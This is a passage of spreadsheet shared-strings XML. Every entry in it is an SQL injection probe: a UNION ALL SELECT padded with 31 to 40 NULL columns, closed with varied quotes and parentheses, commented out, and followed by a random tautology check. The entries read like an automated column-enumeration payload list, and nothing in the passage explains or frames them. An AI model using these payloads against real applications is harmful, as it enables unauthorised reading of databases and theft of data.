    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "XnyV" = "XnyV</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "VXZb" = "VXZb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Euyp" = "Euyp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "XsWR" = "XsWR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Znrb" = "Znrb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "rKOr" = "rKOr</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "binN" = "binN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "gjpt" = "gjpt</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "QaQh" = "QaQh</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "bDCw" = "bDCw</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Ccvy" = "Ccvy</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "OPRm" = "OPRm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Dwth" = "Dwth</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ddUJ" = "ddUJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "eQVh" = "eQVh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "SFBq" = "SFBq</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "vYHf" = "vYHf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "dXYi" = "dXYi</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "MCcT" = "MCcT</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "YWZK" = "YWZK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "kUpY" = "kUpY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "XJjB" = "XJjB</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "xWjT" = "xWjT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "lXQZ" = "lXQZ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "gwsg" = "gwsg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "pXtF" = "pXtF</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "jlXj" = "jlXj</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "olkg" = "olkg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "evOX" = "evOX</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "luWc" = "luWc</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "PGko" = "PGko</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "NJcT" = "NJcT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "idrU" LIKE "idrU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "jcQl" LIKE "jcQl</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "MudQ" LIKE "MudQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "chkf" LIKE "chkf</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "UCWG" LIKE "UCWG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "TJtG" LIKE "TJtG</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "WKWq" LIKE "WKWq</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "HKQL" LIKE "HKQL</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "njdD" LIKE "njdD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "LiXy" LIKE "LiXy</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "isLj" LIKE "isLj</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "pQOr" LIKE "pQOr</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "uFCm" LIKE "uFCm</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "JTuV" LIKE "JTuV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "YtLf" LIKE "YtLf</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "ahRu" LIKE "ahRu</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "xrfJ" LIKE "xrfJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "NGhO" LIKE "NGhO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "MkDq" LIKE "MkDq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "UYHE" LIKE "UYHE</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "bMru" LIKE "bMru</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ruPB" LIKE "ruPB</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "iYlX" LIKE "iYlX</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yaFz" LIKE "yaFz</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "mXYa" LIKE "mXYa</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "gPvj" LIKE "gPvj</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "vCRe" LIKE "vCRe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "YVIx" LIKE "YVIx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "iXnL" LIKE "iXnL</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "llbV" LIKE "llbV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "fFLL" LIKE "fFLL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "sNYL" LIKE "sNYL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "nFpu" LIKE "nFpu</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "gsew" LIKE "gsew</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "mJRD" LIKE "mJRD</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "aNJA" LIKE "aNJA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "aJIY" LIKE "aJIY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "sevY" LIKE "sevY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "TkJR" LIKE "TkJR</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "hHTe" LIKE "hHTe</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7919 = 7919</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3598 = 3598</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 4696 = 4696</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 5884 = 5884</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7865 = 7865</t>
  </si>
  <si>
